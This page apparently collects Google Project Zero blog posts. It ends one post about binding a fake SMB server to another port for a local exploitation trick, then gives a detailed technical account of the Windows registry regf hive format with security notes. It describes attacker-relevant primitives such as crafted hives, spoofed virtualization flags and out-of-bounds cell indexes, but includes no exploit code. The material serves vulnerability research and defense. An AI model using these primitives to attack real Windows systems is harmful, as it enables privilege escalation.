    The problem encountered in the previous blog post was you couldn't bind your fake SMB server to port 445 without shutting down the local SMB server. Shutting down the server can only be done as an administrator, defeating most of the point of the exploitation trick. By changing the client port to one which isn't currently in use, we can open files via our fake SMB server and perform the delay locally without needing to use the Cloud Filter API. This still won't allow the technique to work in a sandbox fortunately.

    Note, that an administrator can disable this feature through Group Policy, but it is enabled by default and non-enterprise users are never likely to change that. I personally think making it enabled by default is a mistake that will come back to cause problems for Windows going forward.

    I've updated the example fake SMB server to allow you to bind to a different port so that you can perform the attack locally. Hopefully someone finds it useful.

    • ✇Project Zero
    • The Windows Registry Adventure #5: The regf file format Google Project Zero
      Posted by Mateusz Jurczyk, Google Project Zero As previously mentioned in the second installment of the blog post series ("A brief history of the feature"), the binary format used to encode registry hives from Windows NT 3.1 up to the modern Windows 11 is called regf. In a way, it is quite special, because it represents a registry subtree simultaneously on disk and in memory, as opposed to most other common file formats. Documents, images, videos, etc. are generally designed to store data
       

    The Windows Registry Adventure #5: The regf file format

    19 de Dezembro de 2024, 16:03

    Posted by Mateusz Jurczyk, Google Project Zero

    As previously mentioned in the second installment of the blog post series ("A brief history of the feature"), the binary format used to encode registry hives from Windows NT 3.1 up to the modern Windows 11 is called regf. In a way, it is quite special, because it represents a registry subtree simultaneously on disk and in memory, as opposed to most other common file formats. Documents, images, videos, etc. are generally designed to store data efficiently on disk, and they are subsequently parsed to and from different in-memory representations whenever they are read or written. This seems only natural, as offline storage and RAM come with different constraints and requirements. On disk, it is important that the data is packed as tightly as possible, while in memory, easy and efficient random access is typically prioritized. The regf format aims to bypass the reparsing step – likely to optimize the memory/disk synchronization process – and reconcile the two types of data encodings into a single one that is both relatively compact and easy to operate on at the same time. This explains, for instance, why hives don't natively support compression (but the clients are of course free to store compressed data in the registry). This unique approach comes with its own set of challenges, and has been a contributing factor in a number of historical vulnerabilities.

    Throughout the 30 years of the format's existence, Microsoft has never released its official specification. However, the data layout of all of the building blocks making up a hive (file header, bin headers, cell structures) are effectively public through the PDB symbols for the Windows kernel image (ntoskrnl.exe) available on the Microsoft Symbol Server. Furthermore, the Windows Internals book series also includes a section that delves into the specifics of the regf format (named Hive structure). Lastly, forensics experts have long expressed interest in the format for analysis purposes, resulting in the creation of several unofficial specifications based on reverse engineering, experimentation and deduction. These sources have been listed in my earlier Learning resources blog post; the two most extensive specifications of this kind can be found here and here. The intent of this post is not to repeat the information compiled in the existing resources, but rather to highlight specific parts of the format that have major relevance to security, or provide some extra context where I found it missing. A deep understanding of the low-level regf format will prove invaluable in grasping many of the higher-level concepts in the registry, as well as the technical details of software bugs discussed in future blog posts.

    The hive structure: header, bins and cells

    On the lowest level, data in hives is organized in chunks of 4 KiB (0x1000 bytes), incidentally the size of a standard memory page in the x86 architecture. The first 4 KiB always correspond to the header (also called the base block), followed by one or more bins, each being a multiple of 4 KiB in length. The header specifies general information about the hive (signature, version, etc.), while bins are an abstraction layer designed to enable the fragmentation of hive mappings in virtual memory – more on that later.

    Each bin starts with a 32-byte (0x20) header, followed by one or more cells that completely fill the bin. A cell is the smallest unit of data in a hive that has a specific purpose (e.g. describes a key, value, security descriptor, and so on). The data of a cell is preceded by a 32-bit integer specifying its size, which must be a multiple of eight (i.e. its three least significant bits are clear), and is either in the free or allocated state. A free (unused) cell is indicated by a positive size, and an allocated cell is indicated by a negative one. For example, a free cell of 32 bytes has a length marker of 0x00000020, while an active cell of 128 bytes has its size encoded as 0xFFFFFF80. This visibly demonstrates the hybrid on-disk / in-memory nature of the hive format as opposed to other classic formats, which don't intentionally leave large chunks of unused space in the files.

    The overall file structure is illustrated in the diagram below:

    Pictoral representation of the overall file structure

    In the Windows kernel, internal functions responsible for handling these low-level hive objects (base block, bins, cells) have names starting with "Hv", for example HvCheckHive, HvpAllocateBin or HvpViewMapCleanup. This part of the registry codebase is crucial as it forms the foundation of the registry logic, enabling the Configuration Manager to easily allocate, free, and access hive cells without concerning itself with the technical details of memory management. It is also a place with significant potential for optimizations, such as the incremental logging added in Windows 8.1, or section-based registry introduced in Windows 10 April 2018 Update (RS4). Both of these mechanisms are well described in the Windows Internals 7 (Part 2) book.

    While integral to the correct functioning of the registry, hive management does not constitute a very large part of the overall registry-related codebase. In my analysis of the registry code growth shown in blog post #2, I counted 100,007 decompiled lines of code corresponding to this subsystem in Windows 11 kernel build 10.0.22621.2134. Out of these, only 10,407 or around 10.4% correspond to hive memory management. This is also reflected in my findings: out of the 52 CVEs assigned by Microsoft, only two of them were directly related to a Hv* function implementation – CVE-2022-37988, a logic bug in HvReallocateCell leading to memory corruption, and CVE-2024-43452, a double-fetch while loading hives from remote network shares. This is not to say that there aren't more bugs in this mechanism, but their quantity is likely proportional to its size relative to the rest of the registry-related code.

    Let's now have a closer look at how each of the basic objects in the hive are encoded and what information they store, starting with the base block.

    Base block

    The base block is represented by a structure called _HBASE_BLOCK in the Windows Kernel, and its layout can be displayed in WinDbg:

    0: kd> dt _HBASE_BLOCK

    nt!_HBASE_BLOCK

       +0x000 Signature        : Uint4B

       +0x004 Sequence1        : Uint4B

       +0x008 Sequence2        : Uint4B

       +0x00c TimeStamp        : _LARGE_INTEGER

       +0x014 Major            : Uint4B

       +0x018 Minor            : Uint4B

       +0x01c Type             : Uint4B

       +0x020 Format           : Uint4B

       +0x024 RootCell         : Uint4B

       +0x028 Length           : Uint4B

       +0x02c Cluster          : Uint4B

       +0x030 FileName         : [64] UChar

       +0x070 RmId             : _GUID

       +0x080 LogId            : _GUID

       +0x090 Flags            : Uint4B

       +0x094 TmId             : _GUID

       +0x0a4 GuidSignature    : Uint4B

       +0x0a8 LastReorganizeTime : Uint8B

       +0x0b0 Reserved1        : [83] Uint4B

       +0x1fc CheckSum         : Uint4B

       +0x200 Reserved2        : [882] Uint4B

       +0xfc8 ThawTmId         : _GUID

       +0xfd8 ThawRmId         : _GUID

       +0xfe8 ThawLogId        : _GUID

       +0xff8 BootType         : Uint4B

       +0xffc BootRecover      : Uint4B


    The first thing that stands out is the fact that even though the base block is 4096-bytes long, it only really stores around 236 bytes of meaningful data, and the rest (the Reserved1 and Reserved2 arrays) are filled with zeros. For a detailed description of each field, I encourage you to refer to the two unofficial regf specifications mentioned earlier. In the sections below, I share additional thoughts on the usage and relevance of some of the most interesting header members.

    Sequence1, Sequence2

    These 32-bit numbers are updated by the kernel during registry write operations to keep track of the consistency state of the hive. If the two values are equal during loading, the hive is in a "clean" state and doesn't require any kind of recovery. If they differ, this indicates that not all pending changes have been fully committed to the primary hive file, and additional modifications must be applied based on the accompanying .LOG/.LOG1/.LOG2 files. From a security point of view, manually controlling these fields may be useful in ensuring that the log recovery logic (HvAnalyzeLogFiles, HvpPerformLogFileRecovery and related functions) gets executed by the kernel. This is what I did when crafting the proof-of-concept files for CVE-2023-35386 and CVE-2023-38154.

    Major, Minor

    These are some of the most consequential fields in the header: they represent the major and minor version of the hive. The only valid major version is 1, while the minor version has been historically an integer between 0 and 6. Here is an overview of the different 1.x versions in existence:

    Version

    Year

    Introduced in

    New features

    1.0

    1992

    Windows NT 3.1 Pre-Release

    Initial format

    1.1

    1993

    Windows NT 3.1

    1.2

    1994

    Windows NT 3.5

    Predefined keys

    1.3

    1995

    Windows NT 4.0

    Fast leaves

    1.4

    2000

    Windows Whistler Beta 1

    Big value support

    1.5

    2001

    Windows XP

    Hash leaves

    1.6

    2016

    Windows 10 Anniversary Update

    Layered keys

    The later versions draw extensively on the earlier ones both conceptually and in terms of the actual implementation – there are non-trivial portions of code in Windows NT 3.1 Beta that are used to this day in the latest Windows 11. But when it comes to pure binary compatibility, versions 1.0 to 1.2 differ too much from the newer ones and have long been considered obsolete. This leaves us with versions ≥ 1.3, which are all cross-compatible and can be used freely on the current systems. Within this group, version 1.4 was an intermediate step in the development of the format, observed only in beta releases of Windows XP (codenamed Whistler). The other three are all in active use, and can be found in a default installation of Windows 10 and 11:

    • 1.3: encodes volatile hives (the root hive, HKLM\HARDWARE), the BCD hive (HKLM\BCD00000000), the user classes hives (HKU\<SID>_Classes), and some application hives (backed by settings.dat).
    • 1.5: encodes a majority of the system hives in HKLM (SYSTEM, SOFTWARE, SECURITY, SAM, DRIVERS), all user hives (HKU\<SID>), and most application hives (backed by ActivationStore.dat).
    • 1.6: encodes all differencing hives, i.e. hives used by processes running inside Application and Server Silos, mounted under \Registry\WC.

    It is worth noting that the hive version is supposed to be indicative of the features used inside; for example, only hives with versions ≥1.4 should use big values (values longer than 1 MiB), only hives with versions ≥1.5 should use hash leaves, etc. However, this is not actually enforced when loading a hive, and newer features being used in older hives will work completely fine. This behavior may become a problem if any part of the registry code makes any assumptions about the structure of the hive based solely on its version. One example of such a vulnerability was CVE-2022-38037, caused by the fact that the CmpSplitLeaf kernel function determined the format of a subkey list based on the hive version and not the binary representation of the list itself. In general, when writing a registry-specific fuzzer, it might be a good idea to flip the minor version between 3-6 to increase the chances of hitting some interesting corner cases related to version handling.

    As a last note, the version number is internally converted to a single 32-bit integer stored in the _HHIVE.Version structure member using the following formula: Minor+(Major*0x1000)-0x1000. In the typical case where the major version is 1, the last two components cancel each other out, e.g. version 1.5 becomes simply "5". This would be fine, if not for the fact that a major version of 0 is also allowed by HvpGetHiveHeader, in which case the minor version can be any value greater or equal to 3. Furthermore, if the kernel enters the header recovery path (because the hive header is corrupted and needs to be recovered from a .LOG file), then one can set the major/minor fields to completely arbitrary values and they will be accepted, as HvAnalyzeLogFiles doesn't perform the same strict checks that HvpGetHiveHeader does. Consequently, it becomes possible to spoof the version saved in _HHIVE.Version and have it take virtually any value in the 32-bit range, but I haven't found any security implications of this behavior, and I'm sharing it simply as a curiosity.

    RootCell

    This is the cell index (offset in the hive file) of the root key, which marks a starting point for the Configuration Manager to parse the hive tree. The root cell is special in many respects: it is the only one in a hive that doesn't have a parent, it cannot be deleted or renamed, its name is unused (it is instead referenced by the name of its mount point), and its security descriptor is treated as the head of the security descriptor linked list. While the RootCell member itself has not been directly involved in any bugs I am aware of, it is worth keeping its special properties in mind when doing registry security research.

    Length

    Specifies the cumulative size of all bins in the hive, i.e. its file size minus 4096 (the size of the header). It is limited to 0x7FFFE000, which reflects the ~2 GiB capacity of the hive stable storage (the part of the hive that resides on disk). Combined with another ~2 GiB of volatile space (in-memory hive data that gets erased on reboot), we get a total maximum size of around 4 GiB when both types of storage space are completely maxed out. Incidentally, that's the same range as a single 32-bit cell index can address.

    Flags

    There are currently only two supported hive flags: 0x1, which indicates whether there are any pending transactions involving the hive, and 0x2, which expresses whether the hive is differencing and contains layered keys or not. The latter flag is typically set when the hive version is 1.6.

    LastReorganizeTime

    In order to address the problem of accumulating fragmentation over time, Windows 8.1 introduced a new mechanism to both shrink and optimize hives during load called reorganization. It happens automatically if the last reorganization took place more than seven days ago and the fragmentation rate of the hive is greater than 1 MiB. Reorganization achieves its goals by starting off with an empty hive and copying all existing keys recursively, taking into account which ones have been used during boot, during system runtime, and not at all since the last reorganization. The end result is that the hive becomes more packed, thanks to the elimination of free cells taking up unnecessary space, and more efficient to operate on, because the "hot" keys are grouped closer together.

    As the name suggests, the LastReorganizeTime member stores the timestamp of the last time a successful reorganization took place. From an attacker's perspective, it can be adjusted to control the behavior of the internal CmpReorganizeHive function and deterministically trigger the reorganization or skip it, depending on the desired end result. In addition to indicating a timestamp, the LastReorganizeTime field may also be equal to one of two special marker values: 0x1 to have the hive unconditionally reorganized on the next load, and 0x2 to clear the access bits on all the keys in the hive, i.e. reset the key usage information that has been collected so far.

    CheckSum

    The CheckSum field at offset 0x1FC stores the checksum of the first 508 bytes of the header (i.e. all data prior to this field), and is simply a 32-bit XOR of the header data treated as a series of 127 consecutive DWORDs. If the computed value is equal to 0xFFFFFFFF (-1), then the checksum is set to 0xFFFFFFFE (-2), and if the computed value is 0x0, then the checksum is 0x1. This means that 0 (all bits clear) and -1 (all bits set) are never valid checksum values. If you wish to examine the kernel implementation of the algorithm, you can find it in the internal HvpHeaderCheckSum function.

    The checksum is particularly important when making changes to existing hives, either for experimentation or during fuzzing. If any data within the first 508 bytes of the file is modified, the checksum needs to be adjusted accordingly. Otherwise, the system will reject the file early in the loading process with the STATUS_REGISTRY_CORRUPT error code, and none of the deeper code paths will be exercised. Therefore, fixing up the checksum is the bare minimum a hive fuzzer should do to maximize its chances of success.

    Other fields

    There are several other pieces of information in the header that carry some value, more so in the context of digital forensics and incident response than strictly low-level system security. For example, "Signature" identifies the file as a regf hive and may make it easier to identify the format in raw memory/disk dumps, while "TimeStamp" indicates the last time the hive has been written to, which can be critical for establishing a timeline of events during an investigation. Furthermore, the Offline Registry Library (offreg.dll) leaves further traces in the generated hive files: a 4-byte "OfRg" identifier at offset 0xB0 (nominally the Reserved1 field) and a serialization timestamp at offset 0x200 (nominally Reserved2). For more information about the meaning and usefulness of each part of the header, please refer to one of the unofficial format specifications.

    Bins

    Bins in registry hives are a simple organizational concept used to split a potentially large hive into smaller chunks that can be mapped in memory independently of each other. Each of them starts with a 32-byte _HBIN structure:

    0: kd> dt _HBIN

    nt!_HBIN

       +0x000 Signature        : Uint4B

       +0x004 FileOffset       : Uint4B

       +0x008 Size             : Uint4B

       +0x00c Reserved1        : [2] Uint4B

       +0x014 TimeStamp        : _LARGE_INTEGER

       +0x01c Spare            : Uint4B


    The four meaningful fields here are the four-byte signature ("hbin"), offset of the bin in the file, size of the bin, and a timestamp. Among them, the signature is a constant, the file size is sanitized early in the hive process and effectively also a constant, and the timestamp is not security-relevant. This leaves us with the size as the most interesting part of the header. The only constraints for it is that it must be a multiple of 0x1000, and the sum of the offset and size must not exceed the total length of the hive (_HBASE_BLOCK.Length). At runtime, bins are allocated as the smallest 4 KiB-aligned regions that fit a cell of the requested size, so in practice, they typically end up being between 4-16 KiB in size, but they may organically be as long as 1 MiB. While longer bins cannot be produced by the Windows kernel, there is nothing preventing a specially crafted hive from being loaded in the system with a bin of ~2 GiB in size, the maximum length of a hive as a whole. This behavior doesn't seem to have any direct security implications, but more generally, it is a great example of how the hive states written by Windows are a strictly smaller subset of the set of states accepted as valid during loading:

    Image showing that the states written by the kernel are a subset of states accepted by the hive loader

    Cells

    Cells are the smallest unit of data in registry hives – they're continuous buffers of arbitrary lengths. They do not have a dedicated header structure like _HBASE_BLOCK or _HBIN, but instead, each cell simply consists of a signed 32-bit size marker followed by the cell's data. The size field is subject to the following constraints:

    • A cell may be in one of two states – allocated and free – as indicated by the sign of the size value. Positive values are used for free cells, and negative ones for allocated cells.
    • The size value accounts for the four bytes occupied by itself.
    • The size value must be a multiple of 8 (i.e. have its three lowest bits set to zero). If a cell with size non-divisible by 8 is allocated at runtime, it is aligned up to the next multiple of 8, potentially leading to some unused padding bytes at the end of the cell.
    • The sum of all consecutive cells in a bin must be equal to the length of the bin. In other words, the bin header followed by tightly packed cells (with no gaps) completely fill the bin space. If the hive loader detects that this is not the case, it forcefully fixes it by creating a single free cell spanning from the failing point up to the end of the bin. This invariant must subsequently hold for the entire time the hive is loaded in the system.

    If cells remind you of heap allocations requested via malloc or HeapAlloc, it is not just your impression. There are many parallels to be drawn between hive cells and heap buffers: both can be allocated and freed, have arbitrary sizes and store a mixture of well-formatted structures and free-form user data. However, there are some significant differences too: heap implementations have evolved to include anti-exploitation mitigations like layout randomization, heap cookies for metadata protection, double-free detection and miscellaneous other consistency checks. On the other hand, hives have none of that: the allocation logic is fully deterministic and doesn't involve any randomness, there is no metadata protection, and generally little to no runtime checks. This is likely caused by the fact that heap chunks have been targets of memory corruption for many decades, whereas the registry was designed with the assumption that once loaded, the hive structure is always internally consistent and intra-hive memory corruption may never occur. This makes the exploitation of certain registry bugs particularly convenient and reliable, as I will demonstrate in future blog posts.

    Like a typical memory allocator interface, cells have alloc, realloc, and free functions. Specifically, the internal routines responsible for these tasks in the Windows kernel are HvAllocateCell, HvReallocateCell and HvFreeCell, and reverse-engineering them allowed me to uncover some helpful insights. For instance, I have found that HvAllocateCell and HvReallocateCell reject allocation sizes larger than 1 MiB, and for requests above 16 KiB, they round the size up to the next power of two. Meanwhile, HvFreeCell performs coalescing of free cells, so there should never be two adjacent free cells in an organically created hive. These are some further examples of behavior that is guaranteed on output, but not enforced on input. This is a prevalent pattern in the Windows registry, and I found it useful to keep track of such primitives in my research, even if they didn't seem particularly useful at the time. Thanks to this, I have discovered at least three security bugs closely related to this phenomenon, including one in the interactions between HvReallocateCell and its callers (CVE-2022-37988).

    Cell indexes

    If we equate cells to heap buffers in user-mode applications, then cell indexes would be pointers. Cells rely on these indexes to interrelate within the registry's complex structure. For example, keys reference security descriptors (to control access), their parent key (to navigate the hierarchy), and optionally the list of subkeys and list of values (to organize data). The list of values references specific value records, which in turn reference the actual data backing cells, and so on. This intricate web of relationships is no different from any semi-complex object in a C/C++ program, where pointers link various data structures.

    On disk, cell indexes are nothing special: they are simply 32-bit offsets from the start of the hive data (after the 0x1000 byte header), which is a typical way of implementing cross-object references in most file formats. However, it's important to note that a cell index must point to the beginning of a cell (not inside it or in the bin header), and the cell must be in the allocated state – otherwise, the index is considered invalid. So when implementing a read-only regf parser operating on the hive as a contiguous memory block, translating cell indexes is as simple as adding them to the starting address of the hive in memory.

    When a hive is loaded in Windows, the management of cell indexes becomes more complex. Hives at rest have a maximum size of 2 GiB, and all of their data is considered stable (persistently stored). On the other hand, an active hive also gains an additional 2 GiB of volatile storage, used for temporary keys and values that reside only in memory. These temporary entries exist only while the hive is loaded (or until the system is shut down) and can be created by calling RegCreateKeyEx with the REG_OPTION_VOLATILE flag, which designates the key as temporary. To distinguish between these two storage spaces in a cell index, the highest bit serves as an indicator: 0x0 for stable space and 0x1 for the volatile one, resulting in large index values (greater than 0x80000000) that readily identify volatile cells.

    But an even bigger complication stems from the fact that hives can shrink and grow at runtime, so it is largely impractical to have them mapped as a single block of memory. To efficiently handle modifications to the registry, Windows maps hives in smaller chunks, which makes the previous method of translating cell indexes obsolete, and necessitates a more sophisticated solution. The answer to the problem are cell maps – pagetable-like structures that divide the 32-bit hive address space into smaller, nested layers, indexed by the respective 1, 10, 9, and 12-bit parts of the 32-bit cell index. Cell maps in the Windows kernel utilize a hierarchical structure consisting of storage arrays, directories, tables, and leaf entries, all defined within the ntoskrnl.exe PDB symbols (the relevant structures are _DUAL, _HMAP_DIRECTORY, _HMAP_TABLE and _HMAP_ENTRY). The layout of cell indexes and cell maps is illustrated in the diagram below, based on a similar diagram in the Windows Internals book, which itself draws from Mark Russinovich's 1999 article, Inside the Registry:

    Cell Index Image

    Cell indexes play a central role in core registry operations, such as creating, reading, updating, and deleting keys and values. The internal kernel function responsible for traversing the cell map and translating cell indexes into virtual addresses is HvpGetCellPaged. In normal conditions, the indexes stay within the bounds of the storage space size (_HHIVE.Storage[x].Length), so HvpGetCellPaged assumes their validity and doesn't perform any additional bounds checking. However, certain memory corruption vulnerabilities may allow attackers to manipulate these cell indexes at runtime. Crucially, I discovered that out-of-bounds cell indexes can serve as a powerful primitive for exploit development, enabling the construction of proof-of-concept exploits that achieve local elevation of privileges. I will elaborate further on this in future exploit-focused blog posts.

    As a last note, the special marker of -1 (0xFFFFFFFF) is used to represent non-existent cells, and can be found in cell indexes pointing at optional data that doesn't exist – basically a hive equivalent of a NULL pointer. The internal name for the constant in the Windows kernel is HCELL_NIL, and under normal circumstances, it should never be passed directly to HvpGetCellPaged. Doing so without guaranteeing that the cell index is valid first would constitute a bug in the Windows kernel (for example, see CVE-2023-35357 or CVE-2023-35358).

    Cell types

    Now that we have familiarized ourselves with the low-level structure of hives that facilitates their efficient management in memory, let's go a little further and learn about the types of information stored in the cells. These are the objects that actually define the registry tree and all of its properties: keys, values, security descriptors, etc. The first subsection provides a general overview of the various cell types found within a hive and the relations between them. The second one goes into the intricate details of their format and usage within the Windows kernel, uncovering obscure implementation details rarely documented elsewhere.

    Overview of cell types

    Registry hives utilize only seven distinct cell types to represent the various data structures within the registry, as outlined below:

    1. Key Node: Represents a single registry key and its associated metadata. It is defined by the _CM_KEY_NODE structure and contains references to other cells, including its parent key, security descriptor, class data (optional), and lists of subkeys (stable and volatile) and values (optional).
    2. Subkey Index: A variable-length list of key node cell indexes, representing the subkeys of a specific key. For performance reasons, there are four variations of subkey indexes: index leaf, fast leaf, hash leaf, and root index. All are represented by the _CM_KEY_INDEX structure.
    3. Security Descriptor: Defines access control information for one or more keys, specifically a security descriptor in a self-relative format. Represented by the _CM_KEY_SECURITY structure, it is the only cell type that can be referenced from multiple key nodes and is therefore reference-counted. It also contains links to the next and previous security descriptors in the hive.
    4. Key Value: Defines a single value associated with a key, including its name, type, data length, and a reference to the cell containing the actual data. It is represented by the _CM_KEY_VALUE structure.
    5. Big Data: Used to store value data exceeding 16,344 bytes (~16 KiB) in hive versions 1.4 and later. The data is divided into chunks of up to 16 KiB each, allowing for values approaching 1 GiB. The _CM_BIG_DATA structure represents this cell type, containing the number of chunks and a reference to the list of chunk cells.
    6. Value List and Chunk List Cells: These cells are simple arrays of 32-bit cell indexes. They are used to store lists of values associated with a key and lists of chunks for large value data.
    7. Data Cells: These cells store the raw data associated with keys and values. They hold the optional class data for a key, the complete data for small values (up to 1 MiB in older hives, ~16 KiB in newer hives), and the individual chunks of large values.

    The diagram below illustrates the relationships between these cell types:

    Diagram illustrating the relationships between these cell types

    Deep dive into each cell type

    Now that we know the general purpose of each cell type, it's a good time to dig a little deeper into each of them. This lets us explore both their implementation details, as well as the spirit behind these objects and how they interact with each other in a real-life environment. I have tried my best to avoid repeating the existing unofficial specifications and instead only focus on the security-relevant and sparsely documented aspects of the format, but if any redundant information makes it into this section, please bear with me. 🙂

    Key nodes

    As keys are the most important part of the registry, key nodes are the most important and complex of all cell types. When dumped in WinDbg, the layout of the _CM_KEY_NODE structure is as follows:

    0: kd> dt _CM_KEY_NODE /r

    nt!_CM_KEY_NODE

       +0x000 Signature        : Uint2B

       +0x002 Flags            : Uint2B

       +0x004 LastWriteTime    : _LARGE_INTEGER

       +0x00c AccessBits       : UChar

       +0x00d LayerSemantics   : Pos 0, 2 Bits

       +0x00d Spare1           : Pos 2, 5 Bits

       +0x00d InheritClass     : Pos 7, 1 Bit

       +0x00e Spare2           : Uint2B

       +0x010 Parent           : Uint4B

       +0x014 SubKeyCounts     : [2] Uint4B

       +0x01c SubKeyLists      : [2] Uint4B

       +0x024 ValueList        : _CHILD_LIST

          +0x000 Count            : Uint4B

          +0x004 List             : Uint4B

       +0x01c ChildHiveReference : _CM_KEY_REFERENCE

          +0x000 KeyCell          : Uint4B

          +0x008 KeyHive          : Ptr64 _HHIVE

       +0x02c Security         : Uint4B

       +0x030 Class            : Uint4B

       +0x034 MaxNameLen       : Pos 0, 16 Bits

       +0x034 UserFlags        : Pos 16, 4 Bits

       +0x034 VirtControlFlags : Pos 20, 4 Bits

       +0x034 Debug            : Pos 24, 8 Bits

       +0x038 MaxClassLen      : Uint4B

       +0x03c MaxValueNameLen  : Uint4B

       +0x040 MaxValueDataLen  : Uint4B

       +0x044 WorkVar          : Uint4B

       +0x048 NameLength       : Uint2B

       +0x04a ClassLength      : Uint2B

       +0x04c Name             : [1] Wchar


    In the following subsections, each member is discussed in more detail.

    Signature

    This field always stores the special value 0x6B6E, which translates to 'nk' when written in little-endian. It exists for informational purposes only, and isn't used for anything meaningful in the code after the initial sanitization during load.

    Flags

    This is a highly interesting and security-relevant field, as it indicates the role of the key in the hive, and clarifies how certain parts of the key node are formatted. The present and historical flags are presented in the table below together with their names and descriptions:

    Mask

    Name

    Description

    0x0001

    KEY_VOLATILE

    (Deprecated) The flag used to indicate that the key and all its subkeys were volatile, but it is obsolete now and hasn't been used in several decades. Information about the key stable/volatile state can be inferred from the highest bit of the key's cell index.

    0x0002

    KEY_HIVE_EXIT

    Indicates that the key is the mount point of another registry hive. These special mount points are used to facilitate attaching new registry hives to the global registry view starting at \Registry in a live system. Exit nodes only ever exist in memory, so hives on disk mustn't have the flag set. More on the subject of mount points and exit nodes can be found in the next section, "Link nodes".

    0x0004

    KEY_HIVE_ENTRY

    Indicates that the given key is the entry to a hive, or in other words, the root of a hive. The flag must be set on the root key of each hive, and mustn't be set on any other nested keys. A hive entry key cannot be a symbolic link (KEY_SYM_LINK mustn't be set).

    0x0008

    KEY_NO_DELETE

    Indicates that the key cannot be deleted: any attempt to do so will return the error code STATUS_CANNOT_DELETE. This flag is always set on hive exit and hive entry keys, but is not allowed for any other keys.

    0x0010

    KEY_SYM_LINK

    Indicates that the key is a symbolic link, which has been created by specifying the REG_OPTION_CREATE_LINK flag in the RegCreateKeyEx call. They are freely accessible and don't come with many restrictions: every key other than a hive exit/entry key can be a symbolic link. However, they are required to adhere to additional structural requirements: they may only contain up to one value, and that value must be of type REG_LINK (6), named "SymbolicLinkValue", and a maximum of 65534 bytes long (32767 wide characters).

    0x0020

    KEY_COMP_NAME

    Indicates that the name of the key consists of ASCII characters only, and thus it has been "compressed" to fit two 8-bit characters in each of the 16-bit wide characters of _CM_KEY_NODE.Name. This optimization aims to save storage space and memory, especially as a great majority of keys have simple, alphanumeric names. This flag can be set on virtually every key in the registry, and indeed, it is by far the most commonly used one.

    0x0040

    KEY_PREDEF_HANDLE

    (Deprecated) The flag used to indicate that the key was a "predefined-handle key", which was a special kind of a symbolic link. The name refers to Predefined Keys, a set of top-level keys such as HKLM or HKCU recognized by the Win32 API. Keys with the KEY_PREDEF_HANDLE flag set allowed the system to redirect certain keys to chosen 32-bit HKEY pseudo-handles, and were specifically introduced in Windows NT 3.5 in 1994 for the purpose of redirecting two system keys related to reading performance data through the registry:

    • HKLM\Software\Microsoft\Windows NT\CurrentVersion\Perflib\009 → HKEY_PERFORMANCE_TEXT
    • HKLM\Software\Microsoft\Windows NT\CurrentVersion\Perflib\CurrentLanguage → HKEY_PERFORMANCE_NLSTEXT

    Contrary to regular symbolic links, predefined keys re-purposed parts of the key node structure (specifically the value list length) to store the link destination, instead of using higher-level features of the format (such as the "SymbolicLinkValue" which is otherwise a perfectly normal value associated with a key). Such a change in semantics required a significant amount of special handling of predefined keys, which were not supposed to be operated on other than being opened. This, in turn, led to a number of security vulnerabilities related to the feature. For a detailed case study of one of them, CVE-2023-35633, see my Windows Registry Deja Vu: The Return of Confused Deputies talk from CONFidence 2024.

    As recently as 2023, all keys other than hive roots could be predefined keys, provided that they had been manually crafted in a binary controlled hive, because there was otherwise no supported way to create them via API. As a consequence of my reports, the feature was deprecated completely in July 2023 for Windows 10 1607+ and 11, and in December 2023 for older systems. At the time of this writing, the only two predefined keys left in existence are the original "009" and "CurrentLanguage" ones, and all other such keys are transparently converted to normal keys during hive load.

    Furthermore, there are also three flags related to Registry Virtualization, which was introduced in Windows Vista and is supported up to and including Windows 11:

    Mask

    Name

    Description

    0x0080

    VirtualSource

    Indicates that the key has been subject to virtualization, i.e. that it has a counterpart in the virtual store subtree. It is typically set on keys inside HKLM\Software which have been attempted to be opened with write access by a program running as a non-administrator.

    0x0100

    VirtualTarget

    Indicates that the key is a virtual replica of a key in a global system hive that has been subject to virtualization. It is typically set on keys inside HKU\<SID>_Classes\VirtualStore that have been created as a result of virtualization. It can only be set if VirtualStore (0x200) is set on the key, too.

    0x0200

    VirtualStore

    Indicates that the key is part of the virtual store registry subtree, typically HKU\<SID>_Classes\VirtualStore and its subkeys. It means that new virtualization targets may be created inside the key, but it itself isn't necessarily a virtual key (unless the VirtualTarget flag is also set).

    As we can see, the purpose of these flags is to keep track of the virtualization state of each key. Given that they express the internal state of the key and are intended to be modified by the kernel only, there doesn't seem to be a good reason to allow user-mode clients to modify the flags on demand. But in practice, unprivileged users have a lot of control over them: programs may arbitrarily set them in hives loaded from disk that they control (app hives and the user hive), and they may also set and clear them at runtime with the NtSetInformationKey(KeySetVirtualizationInformation) system call, as long as they are granted KEY_SET_VALUE access to the key. This makes it effectively possible to "spoof" virtual source/target/store keys, and opens up all of the registry virtualization code for potential abuse by unprivileged users. This has led to the discovery of multiple bugs directly related to virtualization: CVE-2015-0073 and CVE-2019-0881 by James Forshaw, and several more as part of my recent research.

    LastWriteTime

    This is yet another timestamp, in this case tracked on a key-granularity level. I assume it may be an interesting artifact for purposes of digital forensics, but otherwise it doesn't seem particularly security-relevant. One thing of note is that this information is very easy to query at runtime, as it is returned by the RegQueryInfoKey API, and is also a part of the output structures of numerous key information classes that can be queried via the NtQueryKey system call.

    AccessBits

    While theoretically an 8-bit field, this is effectively a 2-bit bitmask introduced in Windows 8 as part of the hive reorganization logic described earlier. It tracks the system phase(s) in which the key has been accessed: 0x0 if not accessed at all, 0x1 if accessed during boot, and 0x2 if accessed during normal system operation. This information is then used during reorganization to allocate key nodes with similar access bits close together.

    LayerSemantics

    This member is a 2-bit enum, used exclusively in hive version 1.6, which corresponds to differencing hives (also known as delta hives). Differencing hives are closely related to containerization support, and their purpose is to be overlaid on another hive in the system rather than being mounted as a standalone hive. For this reason, every key in a differencing hive is in one of four states, which indicate how the key should be interpreted in relation to the keys below it (i.e. the corresponding keys in lower-layer hives).

    These four states are:

    • Merge-Backed (0): the properties of the key are meant to be merged with the properties of the underlying keys in the key stack.
    • Tombstone (1): the key is deleted at the current level, so none of the keys below it should be considered.
    • Supersede-Local (2): the properties of the key fully supersede any state in the key stack below it: only values associated with that level (and any upper layers) are visible to the user.
    • Supersede-Tree (3): same as Supersede-Local, but it applies to the key itself and recursively to all of its subkeys.

